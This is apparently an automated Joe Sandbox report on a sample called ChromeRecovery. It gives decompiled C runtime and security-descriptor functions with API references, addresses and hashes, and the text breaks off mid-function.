0x00c75bfb
0x00c75c00
0x00000000
0x00c75bf0
0x00c75bf5
0x00c75c0d
0x00c75c0e
0x00c75c16
0x00c75c1e
0x00c75c26
0x00c75c2c
0x00c75c31
0x00c75c34
0x00c75c3c
0x00c75c3c
0x00000000
0x00c75c3c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00c75baf
0x00c75b9a
0x00c75b2b
0x00c75aeb
0x00c75ade
0x00c75abf
0x00c75a80
0x00c75a41
0x00c75a24
0x00c75a0c

APIs

GetSecurityDescriptorDacl.ADVAPI32(?,?,00000000,00C760CD), ref: 00C75A04
SetSecurityDescriptorDacl.ADVAPI32 ref: 00C75A78

Part of subcall function 00C75AB2: GetSecurityDescriptorControl.ADVAPI32 ref: 00C75AD6
Part of subcall function 00C75AB2: MakeAbsoluteSD.ADVAPI32 ref: 00C75B1C
Part of subcall function 00C75AB2: GetLastError.KERNEL32 ref: 00C75B22

Part of subcall function 00C75C47: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00C75C5D

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: DescriptorSecurity$Dacl$AbsoluteControlErrorInitializeLastMake
String ID:
API String ID: 1496159268-0
Opcode ID: 36ae2c9b292124d5e38b103f2860df23c3d7920f350724498d2733848f5bc000
Instruction ID: 0dec8154290b16f756a8b9dc0cdfe96e77a30459679fa59e2aebaa7bfd529928
Opcode Fuzzy Hash: 36ae2c9b292124d5e38b103f2860df23c3d7920f350724498d2733848f5bc000
Instruction Fuzzy Hash: 0421B635600645ABDB14BB75C885BBF77A8DF40760F14C139B86E97142EAB0DE05B660

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E4E6 Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00C7E4E6(intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr _t8;
				intOrPtr _t9;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t30;
				signed int _t36;
				struct _CRITICAL_SECTION** _t38;

				_t30 = __ecx;
				EnterCriticalSection(0xca9e1c);
				_t28 =  *0xca9e34; // 0x0
				_t8 =  *0xca9e38; // 0x0
				_t9 = _t8 + 1;
				 *0xca9e38 = _t9;
				_t25 =  *_t28;
				_t36 = ( *((intOrPtr*)(_t28 + 4)) -  *_t28 >> 2) - _t9;
				_t39 =  *((intOrPtr*)(_t28 + 4)) - _t25 >> 2 - _t36;
				if( *((intOrPtr*)(_t28 + 4)) - _t25 >> 2 <= _t36) {
					E00C7EE2F(_t25);
					asm("int3");
					SetUnhandledExceptionFilter(E00C7E588);
					E00C8349A(__eflags, E00C7E634);
					 *_t38 = 0xc7e7b0;
					_t16 = E00C82EAF(__eflags);
					 *0xca9e38 =  *0xca9e38 - 1;
					__eflags =  *0xca9e38;
					 *_t38 = 0xca9e1c;
					LeaveCriticalSection(??);
					return _t16;
				} else {
					_t17 =  *((intOrPtr*)(_t25 + _t36 * 4));
					 *_t30 = _t17;
					SetUnhandledExceptionFilter( *(_t17 + 0x7c));
					E00C8349A(_t39,  *((intOrPtr*)( *_t30 + 0x80)));
					E00C82EAF(_t39,  *((intOrPtr*)( *_t30 + 0x84)));
					return _t30;
				}
			}

0x00c7e4ed
0x00c7e4ef
0x00c7e4f5
0x00c7e4fb
0x00c7e500
0x00c7e501
0x00c7e50b
0x00c7e510
0x00c7e51a
0x00c7e51c
0x00c7e54d
0x00c7e552
0x00c7e558
0x00c7e563
0x00c7e568
0x00c7e56f
0x00c7e574
0x00c7e574
0x00c7e57a
0x00c7e581
0x00c7e587
0x00c7e51e
0x00c7e51e
0x00c7e521
0x00c7e526
0x00c7e534
0x00c7e541
0x00c7e54c
0x00c7e54c

APIs

EnterCriticalSection.KERNEL32(00CA9E1C,?,?,00C7E59B), ref: 00C7E4EF
SetUnhandledExceptionFilter.KERNEL32 ref: 00C7E526

Part of subcall function 00C82EAF: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C82EB5

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: CriticalEnterExceptionFilterSectionUnhandled__crt_fast_encode_pointer
String ID:
API String ID: 1436098898-0
Opcode ID: b9c5386fe7b00a4cf682320648ae9ad2b6abf396bb294c93828a978ce8ca0822
Instruction ID: 713adbcead94d120101c09039986d8cb9dc3c2fa7b06893128bded851de96e2c
Opcode Fuzzy Hash: b9c5386fe7b00a4cf682320648ae9ad2b6abf396bb294c93828a978ce8ca0822
Instruction Fuzzy Hash: 7CF044366000128FC754EF28ED89A5E7BB1FB4A31471945A5E818CB321DB71EC51DB44

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E553 Relevance: 3.0, APIs: 2, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00C7E553(void* __eflags) {
				void* _t3;
				intOrPtr* _t4;
				void* _t5;

				_t5 = __eflags;
				SetUnhandledExceptionFilter(E00C7E588);
				E00C8349A(_t5, E00C7E634);
				 *_t4 = 0xc7e7b0;
				_t3 = E00C82EAF(_t5);
				 *0xca9e38 =  *0xca9e38 - 1;
				 *_t4 = 0xca9e1c;
				LeaveCriticalSection(??);
				return _t3;
			}

0x00c7e553
0x00c7e558
0x00c7e563
0x00c7e568
0x00c7e56f
0x00c7e574
0x00c7e57a
0x00c7e581
0x00c7e587

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00C7E558

Part of subcall function 00C82EAF: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C82EB5

LeaveCriticalSection.KERNEL32(00C7E634,?,?,00C7E59B), ref: 00C7E581

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: CriticalExceptionFilterLeaveSectionUnhandled__crt_fast_encode_pointer
String ID:
API String ID: 2525146520-0
Opcode ID: df88e15f711eac25a391089bb1532bbed81c7a4942921642c5f12237f4643091
Instruction ID: c26ceddaa76e8689bfdb99a45231b4b6966b0d2d7bbbd3f9159442df9d6c13e8
Opcode Fuzzy Hash: df88e15f711eac25a391089bb1532bbed81c7a4942921642c5f12237f4643091
Instruction Fuzzy Hash: C5D012B6015201CBCF007F90DD4F61C7B70FA6A709B408495E4C545252D7B400409F2B

Uniqueness

Uniqueness Score: -1.00%

Function 00C9328B Relevance: 1.8, APIs: 1, Instructions: 274
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E00C9328B(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E00C8EE18(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E00C8ED84(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x00c93299
0x00c932a0
0x00c932a5
0x00c932ab
0x00c932ae
0x00c932b4
0x00c932b9
0x00c932be
0x00c932be
0x00c932c4
0x00c932c9
0x00c932ce
0x00c932ce
0x00c932d5
0x00c932da
0x00c932df
0x00c932df
0x00c932e6
0x00c932eb
0x00c932f0
0x00c932f0
0x00c932f7
0x00c932fc
0x00c93301
0x00c93301
0x00c93309
0x00c93319
0x00c9332b
0x00c9333d
0x00c93350
0x00c93362
0x00c9336a
0x00c9336f
0x00c93374
0x00c93374
0x00c9337b
0x00c93380
0x00c93380
0x00c93387
0x00c9338c
0x00c9338c
0x00c93393
0x00c93398
0x00c93398
0x00c9339f
0x00c933a4
0x00c933a4
0x00c933ae
0x00c933b0
0x00c933ea
0x00c933b2
0x00c933b7
0x00c933db
0x00c933e3
0x00c933d7
0x00c933d7
0x00c933ed
0x00c933f4
0x00c933f6
0x00c93418
0x00c93420
0x00c93423
0x00c93423
0x00c93425
0x00c93425
0x00c93430
0x00c93436
0x00c9343b
0x00c93442
0x00c9347c
0x00c93487
0x00c9348d
0x00c93490
0x00c93493
0x00c9349f
0x00c934a7
0x00c93444
0x00c93447
0x00c93453
0x00c93459
0x00c9345f
0x00c93462
0x00c9346b
0x00c9346b
0x00c934aa
0x00c934b8
0x00c934be
0x00c934c1
0x00c934c6
0x00c934c8
0x00c934cb
0x00c934cb
0x00c934d0
0x00c934d2
0x00c934d5
0x00c934d5
0x00c934da
0x00c934dc
0x00c934df
0x00c934df
0x00c934e4
0x00c934e6
0x00c934e9
0x00c934e9
0x00c934ee
0x00c934f0
0x00c934f0
0x00c934fd
0x00c93500
0x00c93537
0x00c93502
0x00c93502
0x00c93505
0x00c93530
0x00c93525
0x00c93525
0x00c93539
0x00c93541
0x00c93544
0x00c93563
0x00c93568
0x00c93568
0x00c9356a
0x00c9356f
0x00c9357b
0x00c93571
0x00c93574
0x00c93574
0x00c93580
0x00c93580
0x00c93546
0x00c93549
0x00c93558
0x00000000
0x00c93558
0x00c9354b
0x00c9354e
0x00c93550
0x00c93550
0x00000000
0x00c9354e
0x00c93507
0x00c9350a
0x00c93520
0x00000000
0x00c93520
0x00c9350f
0x00c93511
0x00c93511
0x00c9350f
0x00000000
0x00c93500
0x00c933fd
0x00c9340b
0x00c93413
0x00000000
0x00c93413
0x00c93401
0x00c93406
0x00c93406
0x00000000
0x00c93401
0x00c933be
0x00c933cc
0x00c933d4
0x00000000
0x00c933d4
0x00c933c2
0x00c933c7
0x00c933c7
0x00c933c2

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000000), ref: 00C934B8

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 73fa6f1037c973b27b5f02b7deaa83995c04fcd4e597c913e82276e9e81753bf
Instruction ID: 7a451e2b2ce546abd86bf510de64b4acce87a26b13a092fa86c9d68cbd9db95b
Opcode Fuzzy Hash: 73fa6f1037c973b27b5f02b7deaa83995c04fcd4e597c913e82276e9e81753bf
Instruction Fuzzy Hash: D0B13D31610648DFDB15CF28C48AB657BE0FF45364F258658E9AACF2A1C735EE92CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00C87E39 Relevance: 1.6, Strings: 1, Instructions: 388
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00C87E39(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				short _v28;
				signed int _v32;
				signed int* _v36;
				intOrPtr _v40;
				signed int _v44;
				void* __ebp;
				signed int _t149;
				signed int _t151;
				signed int _t152;
				void* _t153;
				signed char _t157;
				signed int _t161;
				short _t163;
				signed char _t168;
				signed char _t171;
				signed int* _t176;
				signed int _t178;
				signed int _t183;
				signed int* _t188;
				signed int _t190;
				signed int* _t192;
				signed int* _t198;
				signed short _t200;
				signed int _t201;
				void* _t202;
				signed int* _t208;
				void* _t209;
				void* _t211;
				signed char _t213;
				signed char _t215;
				signed int _t216;
				signed int _t219;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				signed int** _t227;
				signed int* _t228;
				void* _t229;
				void* _t231;
				signed int _t235;
				unsigned int _t237;
				signed int* _t238;
				signed int _t240;
				signed int* _t241;
				intOrPtr _t242;
				void* _t244;
				signed char _t247;
				signed int _t248;
				signed int _t257;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				void* _t263;
				signed int _t264;
				signed int _t266;
				void* _t267;
				void* _t268;
				signed int _t269;
				short _t270;
				signed int _t273;
				intOrPtr* _t276;
				void* _t277;
				signed int _t278;
				void* _t279;
				void* _t280;
				void* _t281;

				_t268 = __edi;
				_t149 =  *0xca8008; // 0x617e0cdd
				_v8 = _t149 ^ _t278;
				_t276 = __ecx;
				_t226 = 0;
				_t257 = 0x41;
				_t151 =  *(__ecx + 0x2e) & 0x0000ffff;
				_v20 = _t257;
				_t231 = 0x58;
				_t280 = _t151 - 0x64;
				if(_t280 > 0) {
					__eflags = _t151 - 0x70;
					if(__eflags > 0) {
						_t152 = _t151 - 0x73;
						__eflags = _t152;
						if(_t152 == 0) {
							L9:
							_t153 = E00C88923(_t276);
							L10:
							if(_t153 != 0) {
								__eflags =  *((intOrPtr*)(_t276 + 0x2c)) - _t226;
								if( *((intOrPtr*)(_t276 + 0x2c)) != _t226) {
									L112:
									L113:
									return E00C7F35B(_v8 ^ _t278);
								}
								_push(_t268);
								_t157 =  *(_t276 + 0x1c) >> 4;
								_v16 = _t226;
								_t235 = _t226;
								_v12 = _t226;
								_v24 = _t235;
								_t269 = 0x20;
								__eflags = 1 & _t157;
								if((1 & _t157) == 0) {
									L44:
									_t260 =  *(_t276 + 0x2e) & 0x0000ffff;
									_t270 = 0x78;
									__eflags = _t260 - _t270;
									if(_t260 == _t270) {
										L46:
										__eflags = 1;
										if(1 != 0) {
											L48:
											__eflags = _t260 - 0x61;
											if(_t260 == 0x61) {
												L50:
												_t161 = 1;
												L51:
												_v28 = 0x30;
												__eflags = _t161;
												if(_t161 != 0) {
													L53:
													 *((short*)(_t278 + _t235 * 2 - 0xc)) = _v28;
													_t163 = 0x58;
													__eflags = _t260 - _t163;
													if(_t260 == _t163) {
														L55:
														_t270 = _t163;
														L56:
														 *((short*)(_t278 + _t235 * 2 - 0xa)) = _t270;
														_t235 = _t235 + 2;
														__eflags = _t235;
														_v24 = _t235;
														L57:
														_t273 =  *((intOrPtr*)(_t276 + 0x20)) -  *(_t276 + 0x34) - _t235;
														__eflags =  *(_t276 + 0x1c) & 0x0000000c;
														if(( *(_t276 + 0x1c) & 0x0000000c) != 0) {
															L69:
															_push( *((intOrPtr*)(_t276 + 8)));
															_v36 = _t276 + 0x14;
															_t261 = _t276 + 0x448;
															_v32 = _t261;
															E00C88C3E(_t261,  &_v16, _t235, _t276 + 0x14);
															_t237 =  *(_t276 + 0x1c);
															_t168 = _t237 >> 3;
															__eflags = _t168 & 0x00000001;
															if((_t168 & 0x00000001) == 0) {
																_t238 = _t276 + 0x14;
																L83:
																__eflags =  *((char*)(_t276 + 0x38));
																if( *((char*)(_t276 + 0x38)) != 0) {
																	L97:
																	_push( *((intOrPtr*)(_t276 + 8)));
																	E00C88C3E(_t276 + 0x448,  *((intOrPtr*)(_t276 + 0x30)),  *(_t276 + 0x34), _t238);
																	L98:
																	_t262 = _t276 + 0x448;
																	L99:
																	_t240 =  *(_t276 + 0x14);
																	__eflags = _t240;
																	if(_t240 < 0) {
																		L111:
																		goto L112;
																	}
																	_t171 =  *(_t276 + 0x1c) >> 2;
																	__eflags = _t171 & 0x00000001;
																	if((_t171 & 0x00000001) == 0) {
																		goto L111;
																	}
																	__eflags = _t273;
																	if(_t273 <= 0) {
																		goto L111;
																	}
																	_t277 = 0x20;
																	while(1) {
																		_t263 =  *_t262;
																		__eflags =  *((intOrPtr*)(_t263 + 8)) -  *((intOrPtr*)(_t263 + 4));
																		if( *((intOrPtr*)(_t263 + 8)) !=  *((intOrPtr*)(_t263 + 4))) {
																			_t241 = _v36;
																			 *_t241 = _t240 + 1;
																			 *((intOrPtr*)(_t263 + 8)) =  *((intOrPtr*)(_t263 + 8)) + 1;
																			_t262 = _v32;
																			 *( *( *_t262)) = _t277;
																			_t176 =  *_t262;
																			 *_t176 =  *_t176 + 2;
																			__eflags =  *_t176;
																			_t240 =  *_t241;
																		} else {
																			__eflags =  *((char*)(_t263 + 0xc));
																			if( *((char*)(_t263 + 0xc)) == 0) {
																				_t240 = _t240 | 0xffffffff;
																				__eflags = _t240;
																			} else {
																				_t240 = _t240 + 1;
																			}
																			_t262 = _v32;
																			 *_v36 = _t240;
																		}
																		__eflags = _t240 - 0xffffffff;
																		if(_t240 == 0xffffffff) {
																			goto L111;
																		}
																		_t226 = _t226 + 1;
																		__eflags = _t226 - _t273;
																		if(_t226 < _t273) {
																			continue;
																		}
																		goto L111;
																	}
																	goto L111;
																}
																_t178 =  *(_t276 + 0x34);
																__eflags = _t178;
																if(_t178 <= 0) {
																	goto L97;
																}
																_t242 =  *((intOrPtr*)(_t276 + 8));
																_v40 = _t242;
																__eflags =  *((char*)(_t242 + 0x14));
																if(__eflags == 0) {
																	E00C88A50(_t242, _t261, __eflags);
																	_t178 =  *(_t276 + 0x34);
																}
																_t243 =  *((intOrPtr*)(_t276 + 0x30));
																_v28 =  *((intOrPtr*)(_t276 + 0x30));
																_v20 = _t226;
																__eflags = _t178;
																if(_t178 == 0) {
																	goto L98;
																} else {
																	while(1) {
																		_v24 = 0;
																		_t183 = E00C8D48E(_t243, _t261,  &_v24, _t243,  *((intOrPtr*)( *((intOrPtr*)(_v40 + 0xc)) + 4)),  *((intOrPtr*)(_t276 + 8)));
																		_t279 = _t279 + 0x10;
																		_v16 = _t183;
																		_t262 = _t276 + 0x448;
																		__eflags = _t183;
																		if(_t183 <= 0) {
																			break;
																		}
																		_t244 =  *_t262;
																		_v44 = _v24 & 0x0000ffff;
																		__eflags =  *((intOrPtr*)(_t244 + 8)) -  *((intOrPtr*)(_t244 + 4));
																		if( *((intOrPtr*)(_t244 + 8)) !=  *((intOrPtr*)(_t244 + 4))) {
																			 *(_t276 + 0x14) =  *(_t276 + 0x14) + 1;
																			 *((intOrPtr*)(_t244 + 8)) =  *((intOrPtr*)(_t244 + 8)) + 1;
																			 *( *( *_t262)) = _v44;
																			_t188 =  *_t262;
																			 *_t188 =  *_t188 + 2;
																			__eflags =  *_t188;
																		} else {
																			__eflags =  *((char*)(_t244 + 0xc));
																			if( *((char*)(_t244 + 0xc)) == 0) {
																				 *(_t276 + 0x14) =  *(_t276 + 0x14) | 0xffffffff;
																			} else {
																				 *(_t276 + 0x14) =  *(_t276 + 0x14) + 1;
																			}
																		}
																		_t243 = _v28 + _v16;
																		_t190 = _v20 + 1;
																		_v28 = _v28 + _v16;
																		_v20 = _t190;
																		__eflags = _t190 -  *(_t276 + 0x34);
																		if(_t190 !=  *(_t276 + 0x34)) {
																			continue;
																		} else {
																			goto L99;
																		}
																	}
																	 *(_t276 + 0x14) =  *(_t276 + 0x14) | 0xffffffff;
																	goto L99;
																}
															}
															_t247 = _t237 >> 2;
															__eflags = _t247 & 0x00000001;
															_t238 = _t276 + 0x14;
															if((_t247 & 0x00000001) != 0) {
																goto L83;
															}
															_v24 = _t226;
															__eflags = _t273;
															if(_t273 <= 0) {
																goto L83;
															}
															_t264 =  *_t238;
															_t227 = _t276 + 0x448;
															while(1) {
																_t192 =  *_t227;
																_v20 = _t192;
																_t228 = _t192;
																__eflags = _t192[2] - _t228[1];
																_t227 = _t276 + 0x448;
																if(_t192[2] != _t228[1]) {
																	 *_t238 = _t264 + 1;
																	 *((intOrPtr*)(_v20 + 8)) =  *((intOrPtr*)(_v20 + 8)) + 1;
																	 *( *( *_t227)) = _v28;
																	_t198 =  *_t227;
																	 *_t198 =  *_t198 + 2;
																	__eflags =  *_t198;
																	_t261 =  *_t238;
																} else {
																	_t201 = _v20;
																	__eflags =  *((char*)(_t201 + 0xc));
																	if( *((char*)(_t201 + 0xc)) == 0) {
																		_t261 = _t261 | 0xffffffff;
																		__eflags = _t261;
																	} else {
																		_t261 = _t261 + 1;
																	}
																	 *_t238 = _t261;
																}
																__eflags = _t261 - 0xffffffff;
																if(_t261 == 0xffffffff) {
																	break;
																}
																_t200 = _v24 + 1;
																_v24 = _t200;
																__eflags = _t200 - _t273;
																if(_t200 < _t273) {
																	continue;
																}
																break;
															}
															_t226 = 0;
															goto L83;
														}
														__eflags = _t273;
														if(_t273 <= 0) {
															goto L69;
														}
														_t266 =  *(_t276 + 0x14);
														_t248 = _t226;
														while(1) {
															_t202 =  *(_t276 + 0x448);
															_t229 =  *(_t276 + 0x448);
															__eflags =  *((intOrPtr*)(_t202 + 8)) -  *((intOrPtr*)(_t229 + 4));
															if( *((intOrPtr*)(_t202 + 8)) !=  *((intOrPtr*)(_t229 + 4))) {
																 *(_t276 + 0x14) = _t266 + 1;
																_t267 = 0x20;
																( *(_t276 + 0x448))[2] = ( *(_t276 + 0x448))[2] + 1;
																 *( *( *(_t276 + 0x448))) = _t267;
																_t208 =  *(_t276 + 0x448);
																 *_t208 =  *_t208 + 2;
																__eflags =  *_t208;
																_t266 =  *(_t276 + 0x14);
															} else {
																_t209 = _t229;
																__eflags =  *((char*)(_t209 + 0xc));
																if( *((char*)(_t209 + 0xc)) == 0) {
																	_t266 = _t266 | 0xffffffff;
																	__eflags = _t266;
																} else {
																	_t266 = _t266 + 1;
																}
																 *(_t276 + 0x14) = _t266;
															}
															__eflags = _t266 - 0xffffffff;
															if(_t266 == 0xffffffff) {
																break;
															}
															_t248 = _t248 + 1;
															__eflags = _t248 - _t273;
															if(_t248 < _t273) {
																continue;
															}
															break;
														}
														_t235 = _v24;
														_t226 = 0;
														__eflags = 0;
														goto L69;
													}
													__eflags = _t260 - _v20;
													if(_t260 != _v20) {
														goto L56;
													}
													goto L55;
												}
												__eflags = _t161;
												if(_t161 == 0) {
													goto L57;
												}
												goto L53;
											}
											_t161 = _t226;
											__eflags = _t260 - _v20;
											if(_t260 != _v20) {
												goto L51;
											}
											goto L50;
										}
										L47:
										goto L48;
									}
									_t211 = 0x58;
									__eflags = _t260 - _t211;
									if(_t260 != _t211) {
										goto L47;
									}
									goto L46;
								}
